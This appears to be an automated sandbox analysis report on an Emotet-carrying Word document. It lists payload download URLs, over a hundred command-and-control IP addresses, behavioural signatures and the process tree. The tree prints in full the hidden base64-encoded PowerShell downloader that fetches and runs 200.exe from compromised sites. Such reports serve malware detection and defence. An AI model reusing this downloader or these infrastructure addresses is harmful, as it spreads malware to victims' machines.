Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
14-01-2020 23:27
General
Malware Config
Extracted
http://farsmix.com/wp-admin/xpk881/
http://thuong.bidiworks.com/wp-content/q2TO1988/
https://securiteordi.com/wofk253jeksed/QO485/
http://ziyinshedege.com/wp-content/TIGc/
http://luilao.com/yakattack/EmXdYs3Rf/
Extracted
emotet
70.184.69.146:80
186.177.165.196:443
139.47.135.215:80
192.241.143.52:8080
159.65.241.220:8080
45.79.95.107:443
69.163.33.84:8080
177.34.142.163:80
200.123.183.137:443
2.47.112.72:80
190.17.44.48:80
187.54.225.76:80
190.219.149.236:80
190.100.153.162:443
58.171.38.26:80
91.205.215.57:7080
152.231.89.226:80
94.176.234.118:443
201.213.100.141:8080
203.25.159.3:8080
110.142.161.90:443
46.101.212.195:8080
178.79.163.131:8080
151.80.142.33:80
79.7.158.208:80
191.183.21.190:80
188.216.24.204:80
113.190.254.245:80
87.106.46.107:8080
120.150.247.164:80
80.11.158.65:8080
203.130.0.69:80
50.28.51.143:8080
129.205.201.163:80
149.62.173.247:8080
177.242.21.126:80
200.45.187.90:80
77.55.211.77:8080
190.210.236.139:80
202.62.39.111:80
138.68.106.4:7080
2.45.112.134:80
83.165.78.227:80
76.69.26.71:80
207.154.204.40:8080
212.71.237.140:8080
58.162.218.151:80
189.201.197.98:8080
68.187.160.28:443
190.151.5.130:443
151.231.7.154:80
91.83.93.124:7080
200.58.83.179:80
187.188.166.192:8080
96.61.113.203:80
72.29.55.174:80
181.30.61.163:443
94.200.114.162:80
190.191.82.216:80
200.82.170.231:80
97.120.32.227:80
186.15.52.123:80
89.211.114.203:80
188.135.15.49:80
86.42.166.147:80
204.225.249.100:7080
45.8.136.201:80
37.187.6.63:8080
190.195.129.227:8090
192.241.146.84:8080
68.174.15.223:80
200.55.53.7:80
79.7.114.1:80
91.74.175.46:80
85.105.241.192:80
181.129.96.162:990
181.10.204.106:80
110.170.65.146:80
181.29.101.13:8080
189.26.118.194:80
188.218.104.226:80
104.131.58.132:8080
217.199.160.224:8080
139.162.118.88:8080
113.61.76.239:80
118.36.70.245:80
93.144.226.57:80
87.106.77.40:7080
186.68.48.204:443
142.93.114.137:8080
181.36.42.205:443
181.30.61.163:80
46.28.111.142:7080
181.167.96.215:80
94.200.126.42:80
86.123.138.76:80
14.201.35.38:80
179.208.84.218:8080
5.196.35.138:7080
216.251.83.79:80
68.183.170.114:8080
2.42.173.240:80
91.117.159.233:80
165.228.195.93:80
59.120.5.154:80
114.109.179.60:80
99.252.27.6:80
45.73.157.243:8080
185.94.252.12:80
119.59.124.163:8080
62.15.36.103:443
185.160.212.3:80
62.75.143.100:7080
185.86.148.222:8080
191.103.76.34:443
172.104.169.32:8080
181.231.220.232:80
82.196.15.205:8080
81.16.1.45:80
62.75.160.178:8080
109.169.86.13:8080
81.213.78.151:443
189.19.81.181:443
190.186.164.23:80
185.160.229.26:80
68.183.190.199:8080
190.210.184.138:995
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
powershell.exe200.exemalertserial.exedescription pid process target process PID 3704 wrote to memory of 4540 3704 powershell.exe 200.exe PID 4540 wrote to memory of 4512 4540 200.exe 200.exe PID 4372 wrote to memory of 4332 4372 malertserial.exe malertserial.exe -
Drops file in System32 directory 1 IoCs
Processes:
200.exedescription ioc process File renamed C:\Users\Admin\200.exe => C:\Windows\SysWOW64\malertserial.exe 200.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE200.exe200.exemalertserial.exemalertserial.exepid process 5096 WINWORD.EXE 4540 200.exe 4512 200.exe 4372 malertserial.exe 4332 malertserial.exe -
Process spawned unexpected child process 1 IoCs
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3704 3760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3704 powershell.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
200.exemalertserial.exepid process 4512 200.exe 4332 malertserial.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 5096 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 3704 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
200.exe200.exemalertserial.exemalertserial.exepid process 4540 200.exe 4512 200.exe 4372 malertserial.exe 4332 malertserial.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cf9b2af087793eebd071ffaf8de083dd96691178a2a07f9ed5b28fcbae262484.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABXAHoAcgBtAGEAbAB4AHUAeABxAD0AJwBRAGwAZgBjAGgAYgB0AG8AdwBxACcAOwAkAFEAdQBvAG4AaQByAGwAaQBqACAAPQAgACcAMgAwADAAJwA7ACQAQQBvAGwAaQBnAHcAcwBlAHYAcgBlAD0AJwBVAGMAZABwAG8AbwBlAGkAeABjAGMAbwBlACcAOwAkAEUAYgBpAGUAbgBkAGwAbAB2AG8AYgBqAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABRAHUAbwBuAGkAcgBsAGkAagArACcALgBlAHgAZQAnADsAJABQAG0AZgB1AG4AeABhAHcAbQBtAHEAPQAnAEkAdgB1AGIAaQBpAGcAcgBrAGgAYgBxACcAOwAkAEQAZgByAHQAcQB5AGoAbQB2AD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcAZQBCAEMATABpAEUATgB0ADsAJABSAHUAcAB2AG0AdQB2AHkAagBvAHMAPQAnAGgAdAB0AHAAOgAvAC8AZgBhAHIAcwBtAGkAeAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeABwAGsAOAA4ADEALwAqAGgAdAB0AHAAOgAvAC8AdABoAHUAbwBuAGcALgBiAGkAZABpAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHEAMgBUAE8AMQA5ADgAOAAvACoAaAB0AHQAcABzADoALwAvAHMAZQBjAHUAcgBpAHQAZQBvAHIAZABpAC4AYwBvAG0ALwB3AG8AZgBrADIANQAzAGoAZQBrAHMAZQBkAC8AUQBPADQAOAA1AC8AKgBoAHQAdABwADoALwAvAHoAaQB5AGkAbgBzAGgAZQBkAGUAZwBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AVABJAEcAYwAvACoAaAB0AHQAcAA6AC8ALwBsAHUAaQBsAGEAbwAuAGMAbwBtAC8AeQBhAGsAYQB0AHQAYQBjAGsALwBFAG0AWABkAFkAcwAzAFIAZgAvACcALgAiAHMAUABsAGAAaQB0ACIAKAAnACoAJwApADsAJABEAG0AaQB1AGMAbwBjAG8AaQA9ACcARwBhAHUAZgByAGMAeQB1AGwAegAnADsAZgBvAHIAZQBhAGMAaAAoACQAUQBnAGMAawB1AGoAbwBjAHQAIABpAG4AIAAkAFIAdQBwAHYAbQB1AHYAeQBqAG8AcwApAHsAdAByAHkAewAkAEQAZgByAHQAcQB5AGoAbQB2AC4AIgBkAG8AVwBuAEwAbwBgAEEARABgAEYASQBMAGUAIgAoACQAUQBnAGMAawB1AGoAbwBjAHQALAAgACQARQBiAGkAZQBuAGQAbABsAHYAbwBiAGoAKQA7ACQAQgBmAHYAYgB4AGUAZQBlAGUAPQAnAFgAawBkAHMAbgBnAHEAdABuAGoAcgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEUAYgBpAGUAbgBkAGwAbAB2AG8AYgBqACkALgAiAGwARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMgAxADMANAA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAcgB0ACIAKAAkAEUAYgBpAGUAbgBkAGwAbAB2AG8AYgBqACkAOwAkAE0AdABmAGQAdgBvAGgAYwBlAGgAPQAnAE0AZQBqAGUAZwBmAHQAawB4ACcAOwBiAHIAZQBhAGsAOwAkAEsAawBvAHUAZwBuAHkAagBkAG8AcAA9ACcAWgBiAGkAeQBqAHUAZgB2AGQAZwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABKAGkAYwBsAGgAeABvAHEAZgB2AD0AJwBVAGEAbwBmAHkAbAB0AHcAcwAnAA==1⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\200.exe"C:\Users\Admin\200.exe"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
-
C:\Users\Admin\200.exe--c4bc2c903⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
-
C:\Windows\SysWOW64\malertserial.exe"C:\Windows\SysWOW64\malertserial.exe"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
-
C:\Windows\SysWOW64\malertserial.exe--26dbb0b52⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\403f0cc78adafaecdb503a6c6424923d_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
C:\Users\Admin\200.exe
-
C:\Users\Admin\200.exe
-
C:\Users\Admin\200.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
C:\Windows\SysWOW64\malertserial.exe
-
C:\Windows\SysWOW64\malertserial.exe
-
memory/4332-17-0x0000000000D50000-0x0000000000D67000-memory.dmpFilesize
92KB
-
memory/4332-18-0x0000000000400000-0x000000000046E000-memory.dmpFilesize
440KB
-
memory/4372-14-0x00000000006C0000-0x00000000006D7000-memory.dmpFilesize
92KB
-
memory/4512-12-0x0000000000400000-0x000000000046E000-memory.dmpFilesize
440KB
-
memory/4512-11-0x0000000002090000-0x00000000020A7000-memory.dmpFilesize
92KB
-
memory/4540-8-0x00000000021E0000-0x00000000021F7000-memory.dmpFilesize
92KB